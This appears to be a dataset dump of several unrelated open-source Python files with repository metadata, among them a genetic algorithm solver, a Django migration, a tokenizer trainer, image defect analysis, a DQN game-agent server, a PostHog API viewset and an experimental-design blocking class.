selected_index = np.random.choice(len(self.chromosome_list), n, p=self.rolling_wheel_prob)
return [self.chromosome_list[i] for i in selected_index]
class GeneticAlgorithmSolver:
def __init__(self, _problem: Problem):
self.problem = _problem
self.population_size = 100
self.selection_size = int(self.population_size * 0.3)
self.population = self.generate_initial_population()
def generate_initial_population(self) -> Population:
_chromo_list = set()
genome = list(range(self.problem.problem_size))
while len(_chromo_list) != self.population_size:
# for _ in range(self.population_size):
_chromo_list.add(Chromosome(deepcopy(genome), self.problem))
random.shuffle(genome)
return Population(list(_chromo_list), self.problem)
def selection(self, population: Population) -> List[Chromosome]:
"""
Rolling wheel selection
:param population:
:return:
"""
return population.select_n_chromosomes(self.selection_size)
def ordered_crossover(self, chrom_1: Chromosome, chrom_2: Chromosome) -> Chromosome:
_ub = len(chrom_1.genome) - 1
start_index = np.random.randint(0, _ub)
end_index = start_index + np.random.randint(1, _ub - start_index + 1)
alpha_genome = chrom_1.genome[start_index:end_index]
beta_genome = [gen for gen in chrom_2.genome if gen not in alpha_genome]
resulted_genome = beta_genome[:start_index] + alpha_genome + beta_genome[start_index:]
return Chromosome(resulted_genome, self.problem)
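    # Hedged worked example of the crossover above (indices chosen for
    # illustration): parent 1 genome [0, 1, 2, 3, 4], parent 2 genome
    # [4, 3, 2, 1, 0], start_index=1, end_index=3 -> alpha = [1, 2] (slice of
    # parent 1), beta = [4, 3, 0] (parent 2's genes with alpha removed),
    # child = beta[:1] + alpha + beta[1:] = [4, 1, 2, 3, 0].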
def reproduction(self, parents: List[Chromosome], n: int) -> List[Chromosome]:
        pairs_universe: List[Tuple[Chromosome, Chromosome]] = [(ch_1, ch_2) for ch_1 in parents for ch_2 in parents
                                                               if ch_1 != ch_2]
# pair_sample = [pairs_universe[i] for i in
# ]
child_list = set()
# for parent_1, parent_2 in pair_sample:
while len(child_list) != n:
parent_1, parent_2 = pairs_universe[
np.random.choice(len(pairs_universe), n, p=[1 / len(pairs_universe)] * len(pairs_universe))[0]]
child_list.add(self.ordered_crossover(parent_1, parent_2))
return list(child_list)
def solve(self) -> Chromosome:
current_best: Chromosome = self.population.get_best_chromosome()
# t = trange(100, desc='Solving')
for _ in range(25000):
# avg_fitness = np.average([it.fitness for it in self.population.chromosome_list])
# t.set_description('Solving (avg fitness=%g)' % avg_fitness)
parents = self.selection(self.population)
childes = self.reproduction(parents, self.population_size - self.selection_size)
self.population = self.mutation(childes, parents)
cand_best: Chromosome = self.population.get_best_chromosome()
if cand_best.fitness < current_best.fitness:
current_best = cand_best
# print('Best update: {0}'.format(current_best.fitness))
return current_best
def mutation(self, _childes: List[Chromosome], _parents: List[Chromosome]):
def _mutate(_chromosome: Chromosome) -> Chromosome:
def _swap(_chromosome, a_ind, b_ind) -> Chromosome:
_genome = _chromosome.genome
_genome[a_ind], _genome[b_ind] = _genome[b_ind], _genome[a_ind]
return Chromosome(_genome, self.problem)
def _scramble(_chromosome, a_ind, b_ind) -> Chromosome:
_genome = _chromosome.genome
_buff = deepcopy(_genome[a_ind:b_ind])
random.shuffle(_buff)
_genome[a_ind:b_ind] = _buff
return Chromosome(_genome, self.problem)
_ub = len(_chromosome.genome) - 1
start_index = np.random.randint(0, _ub)
end_index = start_index + np.random.randint(1, _ub - start_index + 1)
if random.uniform(0, 1) > 0.5:
return _swap(_chromosome, start_index, end_index)
else:
return _scramble(_chromosome, start_index, end_index)
unmutated_population = _childes + _parents
threshold = random.uniform(1 / self.population_size, 1 / self.problem.problem_size)
resulted_population = []
for chromosome in unmutated_population:
if random.uniform(0, 1) > threshold:
resulted_population.append(chromosome)
else:
resulted_population.append(_mutate(chromosome))
return Population(resulted_population, self.problem)
def main(path):
problem_name = path.split("/")[-1].split(".")[0]
tai_problem = Problem(path)
genetic_solver = GeneticAlgorithmSolver(tai_problem)
solution = genetic_solver.solve()
result_dict = json.load(open("../data/best_results.json"))
if result_dict[problem_name] > solution.fitness or result_dict[problem_name] == 0:
solution.persist(os.path.dirname(path), problem_name + ".sol")
print("Improvement in {0} problem!".format(problem_name))
result_dict[problem_name] = int(solution.fitness)
print("Problem {0} finished!".format(problem_name))
json.dump(result_dict, open("../data/best_results.json", 'w'), indent=2)
if __name__ == "__main__":
root_dir = '../data'
problem_path_list = [os.path.join(root_dir, it) for it in os.listdir(root_dir) if
not (it.endswith(".json") or it.endswith(".sol"))] * 10
with Pool(processes=4) as pool:
for res in pool.imap_unordered(main, problem_path_list):
pass
|
[
"pdsmirnov@yandex.ru"
] |
pdsmirnov@yandex.ru
|
ca533f2d101a318a97772ebfb27bef0b60460aa2
|
a82961498421f8dbc6ed15ba7c22d82763b85e95
|
/rides_handling/migrations/0019_auto_20180514_1703.py
|
0ec616da15661531563117745b8860da2fc9c0a5
|
[
"MIT"
] |
permissive
|
EverythingWorks/Unter
|
f7ae61c33f66ec37b48a3e2f86dfa6f5d9edd9f2
|
a03b4c8fc5cc77095021b9b504ea6c00de8a5a18
|
refs/heads/master
| 2020-03-10T07:25:56.055846
| 2018-06-04T04:22:21
| 2018-06-04T04:22:21
| 129,262,544
| 4
| 1
|
MIT
| 2018-05-29T14:03:35
| 2018-04-12T14:17:22
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 747
|
py
|
# Generated by Django 2.0.4 on 2018-05-14 17:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rides_handling', '0018_auto_20180512_0937'),
]
operations = [
migrations.AddField(
model_name='ride',
name='estimated_trip_time',
field=models.DecimalField(decimal_places=6, default=0, max_digits=9),
preserve_default=False,
),
migrations.AlterField(
model_name='ride',
name='driver',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='driver', to='rides_handling.Profile'),
),
]
|
[
"danpisq@gmail.com"
] |
danpisq@gmail.com
|
bf81381a68065e4e52ed4a7600692ef8632e9a7c
|
d076d75093b374418b5704703f841623344c0a82
|
/Tokenizer/make_tokenizer.py
|
c02073ccd07173d25698296a1b1dcac4630d2499
|
[] |
no_license
|
sangHa0411/BERT
|
db1e3284ed22927fc2f19e819a5946b634c9bacf
|
cb272f94d77770b9b29d7493238e5ea1c5554420
|
refs/heads/main
| 2023-08-28T14:20:31.398036
| 2021-10-19T01:25:06
| 2021-10-19T01:25:06
| 417,094,479
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,996
|
py
|
import os
import re
import sys
import argparse
from tqdm import tqdm
from nltk.tokenize import sent_tokenize
from konlpy.tag import Mecab
def train(args) :
sys.path.append('../')
from tokenizer import write_data, train_spm
from loader import get_data, preprocess_data
from preprocessor import SenPreprocessor
print('Get Newspaper Data')
data = get_data(args.data_dir, args.file_size)
print('Extract Text Data')
text_data = []
for json_data in tqdm(data) :
text_list = preprocess_data(json_data)
text_data.extend(text_list)
print('Tokenizing Data')
sen_data = []
for text in tqdm(text_data) :
sen_list = sent_tokenize(text)
sen_data.extend(sen_list)
print('Size of Sentence Data : %d \n' %len(sen_data))
print('Preprocessing Data')
mecab = Mecab()
sen_preprocessor = SenPreprocessor(mecab)
sen_preprocessed = []
    for sen in tqdm(sen_data):
        if len(sen) > args.max_size:
            continue
        sen = sen_preprocessor(sen)
        if sen is not None:
            sen_preprocessed.append(sen)
print('Write Text Data')
text_path = os.path.join(args.tokenizer_dir, 'kor_newspaper.txt')
write_data(sen_preprocessed, text_path)
print('Train Tokenizer')
train_spm(text_path, os.path.join(args.tokenizer_dir, 'tokenizer'), args.token_size)
if __name__ == '__main__' :
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='../../Data', help='Korean Newspaper Data directory')
parser.add_argument('--max_size', type=int, default=256, help='max length of sentence')
parser.add_argument('--file_size', type=int, default=30, help='size of newspaper file')
parser.add_argument('--tokenizer_dir', type=str, default='./', help='File Writing Directory')
parser.add_argument('--token_size', type=int, default=35000, help='Token Size (default: 35000)')
args = parser.parse_args()
train(args)
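# Hedged invocation sketch (mirrors the argparse defaults above; paths are
# assumptions):
# python make_tokenizer.py --data_dir ../../Data --max_size 256 --file_size 30 \
#     --tokenizer_dir ./ --token_size 35000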
|
[
"noreply@github.com"
] |
noreply@github.com
|
34d788e9ab997f619139b8af4b45a786cee0aac0
|
ce27a376fa4f6a25008674d007c670a4a0b8bda7
|
/defects_thresholding.py
|
1c96261ba4ebe8222fcc90b839c16ced1c0d9cfa
|
[] |
no_license
|
jrr1984/defects_analysis
|
22139b7734478b6261cf9efeaae755a2c5c71c79
|
2e43b65f1b936516f4a4c8f7feb5d46468864957
|
refs/heads/master
| 2020-12-10T20:00:39.977833
| 2020-04-16T12:00:22
| 2020-04-16T12:00:22
| 233,694,615
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,701
|
py
|
from skimage.filters import threshold_yen,threshold_isodata
from skimage import io,measure,img_as_float,morphology
from skimage.measure import regionprops_table
from skimage.color import label2rgb
import numpy as np
from scipy import ndimage
import matplotlib.pyplot as plt
from matplotlib_scalebar.scalebar import ScaleBar
import pandas as pd
import glob
import time
start_time = time.time()
pixels_to_microns = 0.586
proplist = ['equivalent_diameter','area']
path = "C:/Users/juanr/Documents/mediciones_ZEISS/TILING/NIR/norm/*.tif"
data= []
holes_data = []
i=0
for file in glob.glob(path):
img = io.imread(file)
img = img_as_float(img)
thresh = threshold_yen(img)
binary = img <= thresh
binary_var = img <= (thresh - 0.1*thresh)
masked_binary = ndimage.binary_fill_holes(binary)
masked_binary_var = ndimage.binary_fill_holes(binary_var)
hols = masked_binary.astype(int) - binary
hols_var = masked_binary_var.astype(int) - binary_var
lab = measure.label(hols,connectivity=2)
lab_var = measure.label(hols_var, connectivity=2)
cleaned_holes = morphology.remove_small_objects(lab, connectivity=2)
cleaned_holes_var = morphology.remove_small_objects(lab_var, connectivity=2)
label_image = measure.label(masked_binary,connectivity=2)
label_image_var = measure.label(masked_binary_var, connectivity=2)
label_final = morphology.remove_small_objects(label_image, min_size=15)
label_final_var = morphology.remove_small_objects(label_image_var, min_size=15)
if label_final.any()!=0 and label_final_var.any() !=0:
props = regionprops_table(label_final, intensity_image=img, properties=proplist)
props_var = regionprops_table(label_final_var, intensity_image=img, properties=proplist)
props_df = pd.DataFrame(props)
props_df_var = pd.DataFrame(props_var)
props_df['error_diameter'] = abs(round((props_df['equivalent_diameter'] - props_df_var['equivalent_diameter'])*pixels_to_microns))
props_df['error_area'] = abs(round((props_df['area'] - props_df_var['area']) * pixels_to_microns ** 2))
props_df['img'] = i
data.append(props_df)
print('defects_df')
print(props_df)
print('error')
print(props_df['error_diameter'])
if cleaned_holes.any()!= 0 and cleaned_holes_var.any() != 0:
props_holes = regionprops_table(cleaned_holes, intensity_image=img, properties=proplist)
props_holes_var = regionprops_table(cleaned_holes_var, intensity_image=img, properties=proplist)
holes_df = pd.DataFrame(props_holes)
holes_df_var = pd.DataFrame(props_holes_var)
holes_df['error_diameter'] = abs(round((holes_df['equivalent_diameter'] - holes_df_var['equivalent_diameter'])*pixels_to_microns))
holes_df['error_area'] = abs(round((holes_df['area'] - holes_df_var['area']) * pixels_to_microns**2))
holes_df['img'] = i
holes_data.append(holes_df)
print('holes_df')
print(holes_df)
print('error holes')
print(holes_df['error_diameter'])
print(file, i)
i += 1
df = pd.concat(data)
df['equivalent_diameter'] = round(df['equivalent_diameter'] * pixels_to_microns)
df['area'] = round(df['area'] * pixels_to_microns **2)
df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsNIR_df.pkl")
holes_df = pd.concat(holes_data)
holes_df['equivalent_diameter'] = round(holes_df['equivalent_diameter'] * pixels_to_microns)
holes_df['area'] = round(holes_df['area'] * pixels_to_microns **2)
holes_df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsholesNIR_df.pkl")
print("--- %s minutes ---" % ((time.time() - start_time)/60))
|
[
"juanreto@gmail.com"
] |
juanreto@gmail.com
|
e048ecf2bf1cfedf302f50a696e79ffb86f316b1
|
db5f9683e06afffb1657b3919d302af4eb1c0b2a
|
/miscellaneous/infomaterial/create_state/main.py
|
aa8c08dce913169c02dad351c576de4fccd2ffc4
|
[
"MIT"
] |
permissive
|
Birkenpapier/informaticup21
|
a071e515acac8a60d5cd0fe3d4918fcbf21e3f04
|
193ff04be765dc5f11206f75eb3225cfeb94eb87
|
refs/heads/master
| 2023-03-25T17:51:36.380575
| 2021-01-17T19:24:14
| 2021-01-17T19:24:14
| 352,364,199
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,280
|
py
|
import make_decision as make_d
import pylogging as IC20log
import tensorflow as tf
import numpy as np
import time
import os
from bottle import post, request, run, BaseRequest
from keras.utils import to_categorical
from drl_agent.DQN import DQNAgent
from create_training_data import *
from random import randint
from game_state import *
from PIL import Image
init_action = None
state_init1 = None
state_init2 = None
state_old = None
counter_games = 0
game_state = game_state()
agent = DQNAgent()
def reward_function(game):
if game["round"] == 1:
return 0
if game["outcome"] == 'pending':
return 1 # + game["population_reduction"] * 3
elif game["outcome"] == 'win':
return 20
elif game["outcome"] == 'loss':
return -20
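# Hedged note on the rewards above: round 1 yields 0, a pending round yields
# +1, terminal outcomes yield +/-20, and init_game_next() below treats
# |reward| == 20 as the episode's done flag.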
def init_game(game):
global state_init1
state_init1 = game
action = [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0] # init action without changes or moves
return action
def init_game_next(game_json, game, action):
global state_init1
global state_init2
state_init2 = game
reward1 = reward_function(game_json)
done = None
if reward1 == 20 or reward1 == -20:
done = True
else:
done = False
agent.remember(state_init1, action, reward1, done)
@post("/")
def index():
global init_action
global counter_games
global state_old
game = request.json
print(f'-----------------------> round: {game["round"]}, outcome: {game["outcome"]}')
game_state.update_state(game)
if game is not None:
state = create_save_TD(game_state)
try:
if game["round"] == 1:
init_action = init_game(state)
init_action = {"type": "endRound"}
return init_action
if game["round"] == 2:
init_action_next = init_game_next(game, state, init_action)
# TODO here comes the answer from the agent
except Exception as e:
IC20log.getLogger("Index").error(str(e))
# print(f"this is the action: {action}")
agent.epsilon = 80 - counter_games
try:
        state_old = np.hstack(state) # how to save the old state after the call of the method?
# perform random actions based on agent.epsilon, or choose the action
if randint(0, 200) < agent.epsilon:
final_move = to_categorical(randint(0, 11), num_classes=12)
print(f"final_move based random: {final_move}")
else:
# predict action based on the old state
state_old = np.hstack(state)
prediction = agent.model.predict(state_old.reshape((1, 4450)))
final_move = to_categorical(np.argmax(prediction[0]), num_classes=12)
print(f"final_move based prediction: {final_move}")
# perform new move and get new state
state_new = np.hstack(state)
# set reward for the new state
reward = reward_function(game)
except Exception as e:
IC20log.getLogger("Index").error(str(e))
done = None
if reward == 20 or reward == -20:
done = True
else:
done = False
# store the new data into a long term memory
agent.remember(state_old, final_move, reward, done)
if game["outcome"] == 'loss' or game["outcome"] == 'win':
counter_games += 1
elif game["outcome"] == 'win':
img = Image.open('./data/hiclipart.png')
img.show()
# saving the trained model
if counter_games == 20:
agent.model.save_weights('weights.hdf5')
counter_games += 1
print(f"counter_games: {counter_games}")
action = make_d.Action.create_Action(game_state, final_move)
return action
if __name__ == '__main__':
port = 50123
    # Workaround for the current incompatibility between CUDA and TF -> force CPU use in code
# os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
os.environ['CUDA_VISIBLE_DEVICES'] = ''
if tf.test.gpu_device_name():
print('[DEBUG] GPU found')
else:
print("[DEBUG] No GPU found")
# till here Workaround
IC20log.getLogger("Server Main").info("starting server at Port %s" % port )
BaseRequest.MEMFILE_MAX = 10 * 1024 * 1024
run(host="0.0.0.0", port=port, quiet=True)
|
[
"kevin@peivareh.com"
] |
kevin@peivareh.com
|
77921aade12cd93cfbbbffb1e59a7444b7ad84c1
|
d0d088be9ba855fbc1798d55a0874faee192d8b5
|
/posthog/api/person.py
|
e1d035c0bd7b0f564145380d16c7e281ae576d71
|
[
"MIT"
] |
permissive
|
pplonski/posthog
|
bf62d1bfb36a007adb180faecd418a8d1337f904
|
9ae6854254085bbe10cc4f9c98820d9efed52424
|
refs/heads/master
| 2021-01-08T17:36:18.303885
| 2020-02-20T19:38:07
| 2020-02-20T19:38:07
| 242,096,368
| 2
| 0
|
MIT
| 2020-02-21T09:00:14
| 2020-02-21T09:00:14
| null |
UTF-8
|
Python
| false
| false
| 2,781
|
py
|
from posthog.models import Event, Team, Person, PersonDistinctId
from rest_framework import serializers, viewsets, response, request
from rest_framework.decorators import action
from django.db.models import Q, Prefetch, QuerySet, Subquery, OuterRef
from .event import EventSerializer
from typing import Union
from .base import CursorPagination
class PersonSerializer(serializers.HyperlinkedModelSerializer):
last_event = serializers.SerializerMethodField()
name = serializers.SerializerMethodField()
class Meta:
model = Person
fields = ['id', 'name', 'distinct_ids', 'properties', 'last_event', 'created_at']
def get_last_event(self, person: Person) -> Union[dict, None]:
if not self.context['request'].GET.get('include_last_event'):
return None
last_event = Event.objects.filter(team_id=person.team_id, distinct_id__in=person.distinct_ids).order_by('-timestamp').first()
if last_event:
return {'timestamp': last_event.timestamp}
else:
return None
def get_name(self, person: Person) -> str:
if person.properties.get('email'):
return person.properties['email']
if len(person.distinct_ids) > 0:
return person.distinct_ids[-1]
        return str(person.pk)
class PersonViewSet(viewsets.ModelViewSet):
queryset = Person.objects.all()
serializer_class = PersonSerializer
pagination_class = CursorPagination
def _filter_request(self, request: request.Request, queryset: QuerySet) -> QuerySet:
if request.GET.get('id'):
people = request.GET['id'].split(',')
queryset = queryset.filter(id__in=people)
if request.GET.get('search'):
parts = request.GET['search'].split(' ')
contains = []
for part in parts:
if ':' in part:
queryset = queryset.filter(properties__has_key=part.split(':')[1])
else:
contains.append(part)
queryset = queryset.filter(properties__icontains=' '.join(contains))
queryset = queryset.prefetch_related(Prefetch('persondistinctid_set', to_attr='distinct_ids_cache'))
return queryset
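    # Hedged example of the search filter above (query values are
    # illustrative): ?search=has:email smith keeps people whose properties
    # contain the key 'email' (the token after the colon) and whose serialized
    # properties contain the substring 'smith'.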
def get_queryset(self):
queryset = super().get_queryset()
team = self.request.user.team_set.get()
queryset = queryset.filter(team=team)
queryset = self._filter_request(self.request, queryset)
return queryset.order_by('-id')
@action(methods=['GET'], detail=False)
def by_distinct_id(self, request):
person = self.get_queryset().get(persondistinctid__distinct_id=str(request.GET['distinct_id']))
return response.Response(PersonSerializer(person, context={'request': request}).data)
|
[
"tim.glaser@hiberly.com"
] |
tim.glaser@hiberly.com
|
6eda11f72415c2c9a36b7f5635e2560ef63bf01a
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/pg_1318+062/sdB_pg_1318+062_lc.py
|
ff49a4e872dad3cb97afe62d31f086a25e90d3e8
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[200.185083,5.983667], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_pg_1318+062/sdB_pg_1318+062_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
4c1da163636e9dd3c700a82633474e2178f8f902
|
16234b1ac9e2e2cb64c2e44dfb938525046a0d33
|
/tests/test_vispy_plot.py
|
add3abf99799d98b6e7d8345985a7738a940b24c
|
[
"MIT"
] |
permissive
|
cmsteinBR/FlatCAM
|
8c0b41e2ea63a7c942c77cd1e4fc286b7b99da93
|
f6e492916776384bdf3af28367679c2ae02c926a
|
refs/heads/master
| 2021-01-18T00:22:07.056830
| 2016-08-04T16:08:55
| 2016-08-04T16:08:55
| 66,869,807
| 1
| 0
| null | 2016-08-29T18:32:44
| 2016-08-29T18:32:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,660
|
py
|
import sys
import unittest
from PyQt4 import QtGui, QtCore
from FlatCAMApp import App
from VisPyPatches import apply_patches
import random
import logging
class VisPyPlotCase(unittest.TestCase):
"""
This is a top-level test covering the Gerber-to-GCode
generation workflow.
THIS IS A REQUIRED TEST FOR ANY UPDATES.
"""
filenames = ['test', 'test1', 'test2', 'test3', 'test4']
def setUp(self):
self.app = QtGui.QApplication(sys.argv)
apply_patches()
# Create App, keep app defaults (do not load
# user-defined defaults).
self.fc = App()
self.fc.log.setLevel(logging.ERROR)
def tearDown(self):
del self.fc
del self.app
def test_flow(self):
for i in range(100):
print "Test #", i + 1
# Open test project
self.fc.open_project('tests/project_files/' + self.filenames[random.randint(0, len(self.filenames) - 1)])
print "Project", self.fc.project_filename
# Wait for project loaded and plotted
while True:
self.sleep(500)
if self.fc.proc_container.view.text.text() == 'Idle.' or self.fc.ui.isHidden():
break
# Interrupt on window close
if self.fc.ui.isHidden():
break
# Create new project and wait for a random time
self.fc.on_file_new()
self.sleep(random.randint(100, 1000))
def sleep(self, time):
timer = QtCore.QTimer()
el = QtCore.QEventLoop()
timer.singleShot(time, el, QtCore.SLOT("quit()"))
el.exec_()
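# Hedged note on sleep() above: scheduling quit() on a local QEventLoop lets Qt
# keep processing GUI events while the test waits, which time.sleep() would not.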
|
[
"denis_vic@mail.ru"
] |
denis_vic@mail.ru
|
02d4497caa6522455555c81d2715262be07fb67f
|
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
|
/python/python_24610.py
|
ed0905d8047a088ab943cc1e32bc4dbc7d30b821
|
[] |
no_license
|
AK-1121/code_extraction
|
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
|
5297a4a3aab3bb37efa24a89636935da04a1f8b6
|
refs/heads/master
| 2020-05-23T08:04:11.789141
| 2015-10-22T19:19:40
| 2015-10-22T19:19:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
# Why int() argument must be a string or a number, not 'list'?
PForm
|
[
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] |
ubuntu@ip-172-31-7-228.us-west-2.compute.internal
|
76063ba8a654410eb9a78179fbe0b90a12bb85ad
|
32a0cb40ad22c725f41984d8d234589bdd4cb58f
|
/module_3/tasks/re_1.py
|
a79e75aed30ef0f4cf1be51358aa3f18fa714ae8
|
[] |
no_license
|
egolov/stepic-python
|
2ef7b201d47dc73388b61a01fb864ec978b8d1d2
|
c160c9ef752c0a4dd82217917909ee5547a1e583
|
refs/heads/master
| 2020-03-20T02:15:07.400710
| 2018-06-12T17:20:49
| 2018-06-12T17:20:49
| 137,105,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 240
|
py
|
import re
# 'cat' occurring at least twice
pattern_1 = r".*cat.*cat"
pattern_2 = r"cat"
print(re.match(pattern_1, "abc cat and cat abc")) # is not None
print(re.findall(pattern_2, "abc cat and cat abc")) # len() > 1
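# Hedged expected output (exact match-object repr varies by Python version):
# pattern_1 -> a truthy match object, since 'cat' appears twice in the string
# pattern_2 -> ['cat', 'cat'], so len(...) == 2 > 1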
|
[
"e-golov@yandex-team.ru"
] |
e-golov@yandex-team.ru
|
f6d5899459cd4b1b222d2d880badb5acd97d8ffb
|
ee82b3b34449187dc34ac22afa49d490b8f94831
|
/design/optblock.py
|
1622f3770f44d819e43c3a4b4b6a06f08c4e6328
|
[
"MIT"
] |
permissive
|
raddanki/softblock
|
2d16c0acbcdfbf969f489ab5a832e55c15ec4cc7
|
25f1ed61a0ab4c377e0b57546b57287bb90667bf
|
refs/heads/master
| 2023-04-05T03:08:00.549190
| 2021-04-26T13:27:45
| 2021-04-26T13:27:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
py
|
#! /usr/bin/python3
from sklearn.neighbors import DistanceMetric
import numpy as np
from .nbpMatch import nbpwrap
from .design import Design
class OptBlock(Design):
def __init__(self, treatment_prob: float = 0.5):
self.treatment_prob = treatment_prob
super(OptBlock, self).__init__()
def fit(self, X: np.ndarray, distance="mahalanobis") -> None:
N = X.shape[0]
if N % 2 == 1:
idx_ignore = np.random.choice(N, 1).item()
else:
idx_ignore = None
self.X = X
if distance == "mahalanobis":
inv_cov = np.linalg.pinv(np.cov(X, rowvar=False))
dist_maker = DistanceMetric.get_metric("mahalanobis", VI=inv_cov)
elif distance == "euclidean":
dist_maker = DistanceMetric.get_metric("euclidean")
else:
raise NotImplementedError(
"Only Mahalanobis and Euclidean distance are implemented."
)
distances = dist_maker.pairwise(X)
if idx_ignore is not None:
dist_ignore = distances[idx_ignore, :]
dist_ignore[idx_ignore] = np.inf
idx_nn = np.argmin(dist_ignore)
distances = np.delete(np.delete(distances, idx_ignore, 0), idx_ignore, 1)
n_to_pass = N if idx_ignore is None else N - 1
self.matches = nbpwrap(wt=distances.T.reshape(-1), n=n_to_pass)
# nbpwrap indexes from 1.
self.matches = self.matches - 1
blocks = {tuple(sorted(x)) for x in enumerate(self.matches)}
self.blocks = [list(block) for block in blocks]
self.block_membership = np.array([-1] * N)
for block_id, block in enumerate(blocks):
for member_idx, member in enumerate(block):
if idx_ignore is not None:
if member == idx_nn:
self.blocks[block_id].append(idx_ignore)
self.block_membership[idx_ignore] = block_id
if member >= idx_ignore:
self.block_membership[member+1] = block_id
self.blocks[block_id][member_idx] = member + 1
else:
self.block_membership[member] = block_id
def assign(self, X: np.ndarray) -> np.ndarray:
if X is None:
X = self.X
elif X is self.X:
pass
else:
raise ValueError("Can't go out of sample here.")
N = X.shape[0]
A = np.array([0] * N)
for block in self.blocks:
M = len(block)
En_trt = M * self.treatment_prob
n_trt = int(max(1, np.floor(En_trt)))
n_ctl = int(max(1, np.floor(M - En_trt)))
n_extra = int(np.floor(M - n_trt - n_ctl))
a_extra = int(np.random.choice([0, 1], 1).item())
n_trt += a_extra * n_extra
trted = np.random.choice(M, n_trt, replace=False)
for unit in trted:
A[block[unit]] = 1
return A
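# Hedged usage sketch (data and shapes are illustrative; fit() depends on the
# package-local nbpwrap matcher):
# import numpy as np
# X = np.random.randn(20, 3)
# design = OptBlock(treatment_prob=0.5)
# design.fit(X)            # pairs units into blocks by Mahalanobis distance
# A = design.assign(None)  # 0/1 assignment vector, balanced within each block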
|
[
"arbour@Davids-MacBook-Pro.local"
] |
arbour@Davids-MacBook-Pro.local
|